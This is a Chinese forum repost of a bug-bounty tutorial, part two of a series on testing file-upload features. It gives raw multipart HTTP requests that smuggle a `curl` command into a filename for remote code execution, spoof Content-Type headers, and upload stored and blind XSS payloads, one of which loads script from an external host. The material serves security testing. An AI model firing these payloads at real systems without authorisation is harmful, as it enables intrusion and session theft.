安全矩阵

 找回密码
 立即注册
搜索
查看: 512|回复: 0

赏金猎人系列-如何测试文件上传功能-II

[复制链接]

252

主题

252

帖子

1307

积分

金牌会员

Rank: 6Rank: 6

积分
1307
发表于 2022-12-28 14:21:49 | 显示全部楼层 |阅读模式
原文链接:赏金猎人系列-如何测试文件上传功能-II


前言
接前文: 赏金猎人系列-如何测试文件上传功能
本文继续讲解如何测试文件上传功能
正文
第八种情况
尝试在文件名这里注入命令curl me.com,看可否有RCE
  1. POST /fileUpload HTTP/1.1
  2. Host: company.com
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
  4. Content-Length: Number

  5. Content-Disposition: form-data; name="file"; filename="filename"
  6. `curl me.com`
  7. ---------------------------------------WebKitFormBoundary--
复制代码


第九种情况
文件名改为 file.''gif,
content改为类似: <html><script> alert('XSS ');</script></html>
Content Type 改为 image/png
  1. POST /fileUpload HTTP/1.1
  2. Host: company.com
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
  4. Content-Length: Number

  5. Content-Disposition: form-data; name="file"; filename="file.''gif"
  6. Content-Type: image/png
  7. GIF8
  8. <html><script>alert('XSS');</script></html>
  9. ------WebKitFormBoundary--
复制代码


第十种情况
文件名插入大量的字符或者数字
  1. POST /fileUpload HTTP/1.1
  2. Host: company.com
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
  4. Content-Length: Number

  5. Content-Disposition: form-data; name="file"; filename="xxxxx+.png"
  6. Content-Type: image/png
  7. ------WebKitFormBoundary--
复制代码


第十一种情况
content改为blind xss的payload:<html><head>><script src=https://me.xss.ht></script></head><body></body></html>
  1. POST /fileUpload HTTP/1.1
  2. Host: company.com
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
  4. Content-Length: Number

  5. Content-Disposition: form-data; name="file"; filename="file.html"
  6. Content-Type: image/png
  7. <html><head>><script src=https://me.xss.ht>
  8. </script></head><body></body></html>
  9. ------WebKitFormBoundary--
复制代码


第十二种情况
content改为 xss的payload: <html><body><head> <html><script>alert('XSS');</script></html></head></body></html>
  1. POST /fileUpload HTTP/1.1
  2. Host: company.com
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
  4. Content-Length: Number

  5. Content-Disposition: form-data; name="file"; filename="file.html"
  6. Content-Type: text/html
  7. <html><body><head><script>
  8. alert('XSS');</script></html></head></body></html>
  9. ------WebKitFormBoundary--
复制代码


第十三种情况
针对 Unallowed Type 和 Allowed Type分别设置两次和一次的Content-Type
下面举个Unallowed Type的例子:
  1. POST /fileUpload HTTP/1.1
  2. Host: company.com
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
  4. Content-Length: Number

  5. Content-Disposition: form-data; name="file"; filename="file.png"
  6. Content-Type: text/html
  7. Content-Type: image/png
  8. <html><body><head><script>
  9. alert('XSS');</script></html></head></body></html>
  10. ------WebKitFormBoundary--
复制代码


参考
https://infosecwriteups.com/command-injection-poc-72cc3743f10d

https://anotherhackerblog.com/exploiting-file-uploads-pt1/

https://anotherhackerblog.com/exploiting-file-uploads-pt-2/

https://websecblog.com/vulns/googleplex-com-blind-xss/

https://twitter.com/intigriti/status/1371454019533692930


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 00:16 , Processed in 0.014174 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表